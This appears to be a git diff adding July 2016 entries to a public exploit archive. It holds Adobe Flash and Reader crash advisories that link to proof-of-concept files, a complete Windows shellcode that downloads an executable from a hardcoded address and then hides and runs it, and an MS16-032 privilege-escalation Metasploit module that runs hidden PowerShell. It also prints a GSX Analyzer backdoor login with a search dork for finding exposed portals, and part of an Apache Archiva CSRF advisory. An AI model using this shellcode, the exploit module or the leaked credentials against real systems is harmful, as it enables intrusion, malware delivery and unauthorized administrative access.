COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe fixed the issue (APSB16-26); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== +The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction +that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data. + +##################################################################################### + +=========== +4) POC +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-24.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40101.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40102.txt b/platforms/multiple/dos/40102.txt new file mode 100755 index 000000000..d9e1b7366 --- /dev/null +++ b/platforms/multiple/dos/40102.txt @@ -0,0 +1,59 @@ +##################################################################################### + +# Application: Adobe Flash Player +# Platforms: Windows,OSX +# Versions: 22.0.0.192 and earlier +# Author: Sébastien Morin of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE-2016-4179 +# COSIG-2016-23 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ + +Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia. + +(https://en.wikipedia.org/wiki/Adobe_Flash_Player) + +##################################################################################### + +============================ +2) Rapport de Coordination +============================ + +2016-05-14: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe publish a patch (APSB16-25); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== + +The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction +visiting a Web page or open a specially crafted SWF file, which contains “DefineBitsJPEG2” invalid data. + +##################################################################################### + +=========== +4) POC: +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-23.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40102.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40103.txt b/platforms/multiple/dos/40103.txt new file mode 100755 index 000000000..6f4710d8a --- /dev/null +++ b/platforms/multiple/dos/40103.txt @@ -0,0 +1,59 @@ +##################################################################################### + +# Application: Adobe Flash Player +# Platforms: Windows,OSX +# Versions: 22.0.0.192 and earlier +# Author: Sébastien Morin of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE-2016-4175 +# COSIG-2016-22 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ + +Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia. + +(https://en.wikipedia.org/wiki/Adobe_Flash_Player) + +##################################################################################### + +==================== +2) Report Timeline +==================== + +2016-05-10: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe publish a patch (APSB16-25); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== + +The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction +visiting a Web page or open a specially crafted SWF file, which contains ‘DefineSprite’ invalid data. + +##################################################################################### + +=========== +4) POC: +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-22-1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40103.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40104.txt b/platforms/multiple/dos/40104.txt new file mode 100755 index 000000000..cb5da6b96 --- /dev/null +++ b/platforms/multiple/dos/40104.txt @@ -0,0 +1,57 @@ +##################################################################################### + +# Application: Adobe Flash Player +# Platforms: Windows,OSX +# Versions: 22.0.0.192 and earlier +# Author: Francis Provencher of COSIG +# Website: https://cosig.gouv.qc.ca/avis/ +# Twitter: @COSIG_ +# Date: 12 juillet 2016 +# CVE-2016-4177 +# COSIG-2016-21 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +=============== +1) Introduction +=============== +Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia. + +(https://en.wikipedia.org/wiki/Adobe_Flash_Player) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT; +2016-05-17: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe publish a patch (APSB16-25); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== + +The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction +visiting a Web page or open a specially crafted SWF file, which contains ‘SceneAndFrameData’ invalid data. + +##################################################################################### + +=========== +4) POC: +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-21.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40104.zip + +############################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40105.txt b/platforms/multiple/dos/40105.txt new file mode 100755 index 000000000..8f31aa959 --- /dev/null +++ b/platforms/multiple/dos/40105.txt @@ -0,0 +1,57 @@ +##################################################################################### + +# Application: Adobe Flash Player +# Platforms: Windows,OSX +# Versions: 22.0.0.192 and earlier +# Author: Francis Provencher of COSIG +# Website: https://cosig.gouv.qc.ca/avis/ +# Twitter: @COSIG_ +# Date: 12 juillet 2016 +# CVE-2016-4176 +# COSIG-2016-20 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +=============== +1) Introduction +=============== +Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia. + +(https://en.wikipedia.org/wiki/Adobe_Flash_Player) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT; +2016-05-17: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe publish a patch (APSB16-25); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== + +The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction +visiting a Web page or open a specially crafted SWF file, which contains ‘TAG’ invalid data. + +##################################################################################### + +=========== +4) POC: +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-20.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40105.zip + +############################################################################### \ No newline at end of file diff --git a/platforms/win32/shellcode/40094.c b/platforms/win32/shellcode/40094.c new file mode 100755 index 000000000..abf2e111b --- /dev/null +++ b/platforms/win32/shellcode/40094.c @@ -0,0 +1,432 @@ +/* + Title : Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode + Date : 12-07-2016 + Author : Roziul Hasan Khan Shifat + Tested on: Windows 7 x86 + + +*/ + +/* + + +Disassembly of section .text: + +00000000 <_start>: + 0: 31 c9 xor %ecx,%ecx + 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax + 6: 8b 40 0c mov 0xc(%eax),%eax + 9: 8b 70 14 mov 0x14(%eax),%esi + c: ad lods %ds:(%esi),%eax + d: 96 xchg %eax,%esi + e: ad lods %ds:(%esi),%eax + f: 8b 48 10 mov 0x10(%eax),%ecx + 12: 8b 59 3c mov 0x3c(%ecx),%ebx + 15: 01 cb add %ecx,%ebx + 17: 8b 5b 78 mov 0x78(%ebx),%ebx + 1a: 01 cb add %ecx,%ebx + 1c: 8b 73 20 mov 0x20(%ebx),%esi + 1f: 01 ce add %ecx,%esi + 21: 31 d2 xor %edx,%edx + +00000023 : + 23: 42 inc %edx + 24: ad lods %ds:(%esi),%eax + 25: 01 c8 add %ecx,%eax + 27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) + 2d: 75 f4 jne 23 + 2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) + 36: 75 eb jne 23 + 38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) + 3f: 75 e2 jne 23 + 41: 8b 73 1c mov 0x1c(%ebx),%esi + 44: 01 ce add %ecx,%esi + 46: 8b 14 96 mov (%esi,%edx,4),%edx + 49: 01 ca add %ecx,%edx + 4b: 31 f6 xor %esi,%esi + 4d: 89 d6 mov %edx,%esi + 4f: 89 cf mov %ecx,%edi + 51: 31 c0 xor %eax,%eax + 53: 50 push %eax + 54: 68 61 72 79 41 push $0x41797261 + 59: 68 4c 69 62 72 push $0x7262694c + 5e: 68 4c 6f 61 64 push $0x64616f4c + 63: 54 push %esp + 64: 51 push %ecx + 65: ff d2 call *%edx + 67: 83 c4 0c add $0xc,%esp + 6a: 31 c9 xor %ecx,%ecx + 6c: 68 6c 6c 41 41 push $0x41416c6c + 71: 88 4c 24 02 mov %cl,0x2(%esp) + 75: 68 6f 6e 2e 64 push $0x642e6e6f + 7a: 68 75 72 6c 6d push $0x6d6c7275 + 7f: 54 push %esp + 80: ff d0 call *%eax + 82: 83 c4 0c add $0xc,%esp + 85: 31 c9 xor %ecx,%ecx + 87: 68 65 41 42 42 push $0x42424165 + 8c: 88 4c 24 02 mov %cl,0x2(%esp) + 90: 68 6f 46 69 6c push $0x6c69466f + 95: 68 6f 61 64 54 push $0x5464616f + 9a: 68 6f 77 6e 6c push $0x6c6e776f + 9f: 68 55 52 4c 44 push $0x444c5255 + a4: 54 push %esp + a5: 50 push %eax + a6: ff d6 call *%esi + a8: 83 c4 14 add $0x14,%esp + ab: 50 push %eax + +000000ac : + ac: 58 pop %eax + ad: 31 c9 xor %ecx,%ecx + af: 51 push %ecx + b0: 68 2e 65 78 65 push $0x6578652e + b5: 68 6d 70 6c 65 push $0x656c706d + ba: 68 30 2f 73 61 push $0x61732f30 + bf: 68 36 2e 31 33 push $0x33312e36 + c4: 68 36 38 2e 38 push $0x382e3836 + c9: 68 39 32 2e 31 push $0x312e3239 + ce: 68 3a 2f 2f 31 push $0x312f2f3a + d3: 68 68 74 74 70 push $0x70747468 + d8: 54 push %esp + d9: 59 pop %ecx + da: 31 db xor %ebx,%ebx + dc: 53 push %ebx + dd: 68 2e 65 78 65 push $0x6578652e + e2: 68 70 79 6c 64 push $0x646c7970 + e7: 54 push %esp + e8: 5b pop %ebx + e9: 31 d2 xor %edx,%edx + eb: 50 push %eax + ec: 52 push %edx + ed: 52 push %edx + ee: 53 push %ebx + ef: 51 push %ecx + f0: 52 push %edx + f1: ff d0 call *%eax + f3: 59 pop %ecx + f4: 83 c4 2c add $0x2c,%esp + f7: 31 d2 xor %edx,%edx + f9: 39 d0 cmp %edx,%eax + fb: 51 push %ecx + fc: 75 ae jne ac + fe: 5a pop %edx + ff: 31 d2 xor %edx,%edx + 101: 68 73 41 42 42 push $0x42424173 + 106: 88 54 24 02 mov %dl,0x2(%esp) + 10a: 68 62 75 74 65 push $0x65747562 + 10f: 68 74 74 72 69 push $0x69727474 + 114: 68 69 6c 65 41 push $0x41656c69 + 119: 68 53 65 74 46 push $0x46746553 + 11e: 54 push %esp + 11f: 57 push %edi + 120: ff d6 call *%esi + 122: 83 c4 14 add $0x14,%esp + 125: 31 c9 xor %ecx,%ecx + 127: 51 push %ecx + 128: 68 2e 65 78 65 push $0x6578652e + 12d: 68 70 79 6c 64 push $0x646c7970 + 132: 54 push %esp + 133: 59 pop %ecx + 134: 31 d2 xor %edx,%edx + 136: 83 c2 02 add $0x2,%edx + 139: 52 push %edx + 13a: 51 push %ecx + 13b: ff d0 call *%eax + 13d: 83 c4 08 add $0x8,%esp + 140: 31 c9 xor %ecx,%ecx + 142: 68 78 65 63 41 push $0x41636578 + 147: 88 4c 24 03 mov %cl,0x3(%esp) + 14b: 68 57 69 6e 45 push $0x456e6957 + 150: 54 push %esp + 151: 57 push %edi + 152: ff d6 call *%esi + 154: 83 c4 08 add $0x8,%esp + 157: 31 c9 xor %ecx,%ecx + 159: 51 push %ecx + 15a: 68 2e 65 78 65 push $0x6578652e + 15f: 68 70 79 6c 64 push $0x646c7970 + 164: 54 push %esp + 165: 59 pop %ecx + 166: 31 d2 xor %edx,%edx + 168: 52 push %edx + 169: 51 push %ecx + 16a: ff d0 call *%eax + 16c: 83 c4 08 add $0x8,%esp + 16f: 31 c9 xor %ecx,%ecx + 171: 68 65 73 73 41 push $0x41737365 + 176: 88 4c 24 03 mov %cl,0x3(%esp) + 17a: 68 50 72 6f 63 push $0x636f7250 + 17f: 68 45 78 69 74 push $0x74697845 + 184: 54 push %esp + 185: 57 push %edi + 186: ff d6 call *%esi + 188: ff d0 call *%eax + + +*/ + + + +/* + +section .text + global _start +_start: + +xor ecx,ecx +mov eax,[fs:ecx+0x30] ;Eax=PEB +mov eax,[eax+0xc] ;eax=PEB.Ldr +mov esi,[eax+0x14] ;esi=PEB.Ldr->InMemOrderModuleList +lodsd +xchg esi,eax +lodsd +mov ecx,[eax+0x10] ;ecx=kernel32.dll base address +;------------------------------------ + +mov ebx,[ecx+0x3c] ;kernel32.dll +0x3c=DOS->e_flanew +add ebx,ecx ;ebx=PE HEADER +mov ebx,[ebx+0x78];Data_DIRECTORY->VirtualAddress +add ebx,ecx ;IMAGE_EXPORT_DIRECTORY + +mov esi,[ebx+0x20] ;AddressOfNames +add esi,ecx +;------------------------------------------ +xor edx,edx + +count: +inc edx +lodsd +add eax,ecx +cmp dword [eax],'GetP' +jnz count +cmp dword [eax+4],'rocA' +jnz count +cmp dword [eax+8],'ddre' +jnz count + +;--------------------------------------------- + +mov esi,[ebx+0x1c] ;AddressOfFunctions +add esi,ecx + +mov edx,[esi+edx*4] +add edx,ecx ;edx=GetProcAddress() + +;----------------------------------------- + +xor esi,esi +mov esi,edx ;GetProcAddress() +mov edi,ecx ;kernel32.dll + +;------------------------------------ +;finding address of LoadLibraryA() +xor eax,eax +push eax +push 0x41797261 +push 0x7262694c +push 0x64616f4c + +push esp +push ecx + +call edx + +;------------------------ +add esp,12 +;----------------------------- + +;LoadLibraryA("urlmon.dll") +xor ecx,ecx + +push 0x41416c6c +mov [esp+2],byte cl +push 0x642e6e6f +push 0x6d6c7275 + +push esp +call eax + +;----------------------- + +add esp,12 +;----------------------- +;finding address of URLDownloadToFileA() +xor ecx,ecx +push 0x42424165 +mov [esp+2],byte cl +push 0x6c69466f +push 0x5464616f +push 0x6c6e776f +push 0x444c5255 + +push esp +push eax +call esi + +;------------------------ +add esp,20 +push eax +;--------------------------------------- +;URLDownloadToFileA(NULL,url,save as,0,NULL) +download: +pop eax +xor ecx,ecx +push ecx + +;----------------------------- +;change it to file url + +push 0x6578652e +push 0x656c706d +push 0x61732f30 +push 0x33312e36 +push 0x382e3836 +push 0x312e3239 +push 0x312f2f3a +push 0x70747468 +;----------------------------------- + + +push esp +pop ecx ;url http://192.168.86.130/sample.exe + +xor ebx,ebx +push ebx + +;------------------------ +;save as (no need change it.if U want to change it,do it) +push 0x6578652e +push 0x646c7970 +;------------------------------- +push esp ;pyld.exe +pop ebx ;save as + +xor edx,edx +push eax +push edx +push edx +push ebx +push ecx +push edx + +call eax + +;------------------------- + +pop ecx +add esp,44 +xor edx,edx +cmp eax,edx +push ecx +jnz download ;if it fails to download , retry contineusly +;------------------ +pop edx + +;----------------------- +;Finding address of SetFileAttributesA() +xor edx,edx + + +push 0x42424173 +mov [esp+2],byte dl +push 0x65747562 +push 0x69727474 +push 0x41656c69 +push 0x46746553 + +push esp +push edi + +call esi + +;-------------------------------- + +add esp,20 ;U must adjust stack or it will crash +;-------------------- +;calling SetFileAttributesA("pyld.exe",FILE_ATTRIBUTE_HIDDEN) +xor ecx,ecx +push ecx +push 0x6578652e +push 0x646c7970 + +push esp +pop ecx + +xor edx,edx +add edx,2 ;FILE_ATTRIBUTE_HIDDEN + +push edx +push ecx + +call eax + +;------------------- + +add esp,8 +;--------------------------- + +;finding address of WinExec() +xor ecx,ecx + +push 0x41636578 +mov [esp+3],byte cl +push 0x456e6957 + +push esp +push edi +call esi + +;---------------------- + +add esp,8 + +;------------------------ +;calling WinExec("pyld.exe",0) +xor ecx,ecx +push ecx +push 0x6578652e +push 0x646c7970 + +push esp +pop ecx + +xor edx,edx +push edx +push ecx + +call eax +;------------------------- + +add esp,8 +;----------------------------- + +;finding address of ExitProcess() +xor ecx,ecx +push 0x41737365 +mov [esp+3],byte cl +push 0x636f7250 +push 0x74697845 + +push esp +push edi + +call esi + +;-------------- +call eax + + + +*/ + +#include +#include + +char shellcode[]="\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xf6\x89\xd6\x89\xcf\x31\xc0\x50\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x88\x4c\x24\x02\x68\x6f\x6e\x2e\x64\x68\x75\x72\x6c\x6d\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x65\x41\x42\x42\x88\x4c\x24\x02\x68\x6f\x46\x69\x6c\x68\x6f\x61\x64\x54\x68\x6f\x77\x6e\x6c\x68\x55\x52\x4c\x44\x54\x50\xff\xd6\x83\xc4\x14\x50\x58\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x6d\x70\x6c\x65\x68\x30\x2f\x73\x61\x68\x36\x2e\x31\x33\x68\x36\x38\x2e\x38\x68\x39\x32\x2e\x31\x68\x3a\x2f\x2f\x31\x68\x68\x74\x74\x70\x54\x59\x31\xdb\x53\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x5b\x31\xd2\x50\x52\x52\x53\x51\x52\xff\xd0\x59\x83\xc4\x2c\x31\xd2\x39\xd0\x51\x75\xae\x5a\x31\xd2\x68\x73\x41\x42\x42\x88\x54\x24\x02\x68\x62\x75\x74\x65\x68\x74\x74\x72\x69\x68\x69\x6c\x65\x41\x68\x53\x65\x74\x46\x54\x57\xff\xd6\x83\xc4\x14\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x83\xc2\x02\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x78\x65\x63\x41\x88\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x57\xff\xd6\x83\xc4\x08\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\xff\xd6\xff\xd0"; + +main() +{ +printf("shellcode length %ld\n",(long)strlen(shellcode)); +(* (int(*)()) shellcode) (); +} diff --git a/platforms/windows/local/39719.ps1 b/platforms/windows/local/39719.ps1 index fe840a96c..1b5fcd2a8 100755 --- a/platforms/windows/local/39719.ps1 +++ b/platforms/windows/local/39719.ps1 @@ -207,7 +207,7 @@ function Invoke-MS16-032 { } function Get-SystemToken { - echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)" + echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)" $CallResult = [Kernel32]::SuspendThread($hThread) if ($CallResult -ne 0) { @@ -278,8 +278,8 @@ function Invoke-MS16-032 { $hThread = Get-ThreadHandle # If no thread handle is captured, the box is patched - if (!$hThread) { - echo "[!] No valid thread handles were captured, exiting!`n" + if ($hThread -eq 0) { + echo "[!] No valid thread handle was captured, exiting!`n" Return } else { echo "[?] Done, using thread handle: $hThread" @@ -288,7 +288,7 @@ function Invoke-MS16-032 { # Get handle to SYSTEM access token Get-SystemToken - # If we fail a check in Get-SystemToken, skip loop + # If we fail a check in Get-SystemToken, exit if ($SysTokenHandle -eq 0) { Return } diff --git a/platforms/windows/local/40107.rb b/platforms/windows/local/40107.rb new file mode 100755 index 000000000..8529db010 --- /dev/null +++ b/platforms/windows/local/40107.rb @@ -0,0 +1,195 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/payload_generator' +require 'msf/core/exploit/powershell' +require 'rex' + +class MetasploitModule < Msf::Exploit::Local + + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Process + include Msf::Post::File + include Msf::Post::Windows::ReflectiveDLLInjection + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MS16-032 Secondary Logon Handle Privilege Escalation', + 'Description' => %q{ + This module exploits the lack of sanitization of standard handles in Windows' Secondary + Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 + 32 and 64 bit. This module will only work against those versions of Windows with + Powershell 2.0 or later and systems with two or more CPU cores. + }, + 'License' => BSD_LICENSE, + 'Author' => + [ + 'James Forshaw', # twitter.com/tiraniddo + 'b33f', # @FuzzySec, http://www.fuzzysecurity.com' + 'khr0x40sh' + ], + 'References' => + [ + [ 'MS', 'MS16-032'], + [ 'CVE', '2016-0099'], + [ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ], + [ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html'] + ], + 'DefaultOptions' => + { + 'WfsDelay' => 30, + 'EXITFUNC' => 'thread' + }, + 'DisclosureDate' => 'Mar 21 2016', + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => + [ + # Tested on (32 bits): + # * Windows 7 SP1 + [ 'Windows x86', { 'Arch' => ARCH_X86 } ], + # Tested on (64 bits): + # * Windows 7 SP1 + # * Windows 8 + # * Windows 2012 + [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] + ], + 'DefaultTarget' => 0 + )) + + register_advanced_options( + [ + OptString.new('W_PATH', [false, 'Where to write temporary powershell file', nil]), + OptBool.new( 'DRY_RUN', [false, 'Only show what would be done', false ]), + # How long until we DELETE file, we have a race condition here, so anything less than 60 + # seconds might break + OptInt.new('TIMEOUT', [false, 'Execution timeout', 60]) + ], self.class) + end + + def get_arch + arch = nil + + if sysinfo["Architecture"] =~ /(wow|x)64/i + arch = ARCH_X86_64 + elsif sysinfo["Architecture"] =~ /x86/i + arch = ARCH_X86 + end + + arch + end + + def check + os = sysinfo["OS"] + + if os !~ /win/i + # Non-Windows systems are definitely not affected. + return Exploit::CheckCode::Safe + end + + Exploit::CheckCode::Detected + end + + def exploit + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + arch1 = get_arch + if check == Exploit::CheckCode::Safe + print_error("Target is not Windows") + return + elsif arch1 == nil + print_error("Architecture could not be determined.") + return + end + + # Exploit PoC from 'b33f' + ps_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0099', 'cve_2016_0099.ps1') + vprint_status("PS1 loaded from #{ps_path}") + ms16_032 = File.read(ps_path) + + cmdstr = expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe' + + if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64 + cmdstr.gsub!("System32","SYSWOW64") + print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell") + vprint_warning("#{cmdstr}") + end + + # payload formatted to fit dropped text file + payl = cmd_psh_payload(payload.encoded,payload.arch,{ + encode_final_payload: false, + remove_comspec: true, + method: 'old' + }) + + payl.sub!(/.*?(?=New-Object IO)/im, "") + payl = payl.split("';$s.")[0] + payl.gsub!("''","'") + payl = "$s=#{payl}while($true){Start-Sleep 1000};" + + @upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt" + path = datastore['W_PATH'] || pwd + @upfile = "#{path}\\#{@upfile}" + fd = session.fs.file.new(@upfile,"wb") + print_status("Writing payload file, #{@upfile}...") + fd.write(payl) + fd.close + psh_cmd = "IEX `$(gc #{@upfile})" + + #lpAppName + ms16_032.gsub!("$cmd","\"#{cmdstr}\"") + #lpcommandLine - capped at 1024b + ms16_032.gsub!("$args1","\" -exec Bypass -nonI -window Hidden #{psh_cmd}\"") + + print_status('Compressing script contents...') + ms16_032_c = compress_script(ms16_032) + + if ms16_032_c.size > 8100 + print_error("Compressed size: #{ms16_032_c.size}") + error_msg = "Compressed size may cause command to exceed " + error_msg += "cmd.exe's 8kB character limit." + print_error(error_msg) + else + print_good("Compressed size: #{ms16_032_c.size}") + end + + if datastore['DRY_RUN'] + print_good("cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}") + return + end + + print_status("Executing exploit script...") + cmd = "cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}" + args = nil + + begin + process = session.sys.process.execute(cmd, args, { + 'Hidden' => true, + 'Channelized' => false + }) + rescue + print_error("An error occurred executing the script.") + end + end + + def cleanup + sleep_t = datastore['TIMEOUT'] + vprint_warning("Sleeping #{sleep_t} seconds before deleting #{@upfile}...") + sleep sleep_t + + begin + rm_f(@upfile) + print_good("Cleaned up #{@upfile}") + rescue + print_error("There was an issue with cleanup of the powershell payload script.") + end + end +end \ No newline at end of file diff --git a/platforms/windows/webapps/40106.txt b/platforms/windows/webapps/40106.txt new file mode 100755 index 000000000..00c02e63f --- /dev/null +++ b/platforms/windows/webapps/40106.txt @@ -0,0 +1,31 @@ +# Exploit Title: GSX Analyzer hardcoded superadmin credentials in Main.swf +# Google Dork: inurl:"/Main.swf?cachebuster=" (need to manually look for stringtitle "Loading GSX Analyzer ... 0%") +# Date: 12-07-16 +# Exploit Author: ndevnull +# Vendor Homepage: http://www.gsx.com/products/gsx-analyzer +# Software Link: http://www.gsx.com/download-the-trial-ma +# Version: 10.12, but also found in version 11 +# Tested on: Windows Server 2008 +# CERT : VR-241 +# CVE : + +1. Description + +After decompiling the SWF file "Main.swf", a hardcoded credential in one of the products of GSX, namely GSX Analyzer, has been found. Credential is a superadmin account, which is not listed as a user in the userlist, but can be used to login GSX Analyzer portals. Seemingly a backdoor or a "solution" to provide "support" from the vendor. + +The found credentials are: +Username: gsxlogin +Password: gsxpassword + +2. Proof of Concept + +A few sites externally on the internet are affected by this incident. Presumably all of the externally disclosed GSX analyzer portals have this vulnerability. + +Code snippet: +----------------- +if ((((event.getLogin().toLowerCase() == "gsxlogin")) && ((event.getPwd() == "gsxpassword")))){ +----------------- + +3. Solution: + +Vendor has been informed on 12-06-16, also CERT has been notified with ID VR-241 diff --git a/platforms/xml/webapps/40109.txt b/platforms/xml/webapps/40109.txt new file mode 100755 index 000000000..1cd308c61 --- /dev/null +++ b/platforms/xml/webapps/40109.txt @@ -0,0 +1,138 @@ +RCE Security Advisory +https://www.rcesecurity.com + + +1. ADVISORY INFORMATION +======================= +Product: Apache Archiva +Vendor URL: https://archiva.apache.org +Type: Cross-Site Request Forgery [CWE-253] +Date found: 2016-05-31 +Date published: 2016-07-11 +CVSSv3 Score: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) +CVE: CVE-2016-4469 + + +2. CREDITS +========== +This vulnerability was discovered and researched by Julien Ahrens from +RCE Security. + + +3. VERSIONS AFFECTED +==================== +Apache Archiva v1.3.9 +older versions may be affected too. + + +4. INTRODUCTION +=============== +Apache Archiva™ is an extensible repository management software that helps +taking care of your own personal or enterprise-wide build artifact +repository. It is the perfect companion for build tools such as Maven, +Continuum, and ANT. + +(from the vendor's homepage) + + +5. VULNERABILITY DETAILS +======================== +The application basically offers a Cross-Site Request Forgery protection +using the a Struts-based token called "token". While many administrative +functionalities like adding new users are protected on this way, the +following HTTP POST-based functions are missing this token and are +therefore vulnerable to CSRF: + +Adding new repository proxy connectors: +/archiva/admin/addProxyConnector_commit.action + +Adding new repositories: +/archiva/admin/addRepository_commit.action + +Editing existing repositories: +/archiva/admin/editRepository_commit.action + +Adding legacy artifact paths: +/archiva/admin/addLegacyArtifactPath_commit.action + +Changing the organizational appearance: +/archiva/admin/saveAppearance.action + +Uploading new artifacts: +/archiva/upload_submit.action + + +The following Proof-of-Concept triggers this vulnerability and adds a new +proxy connector called "CSRF": + + + + + + + + + + + + + + + 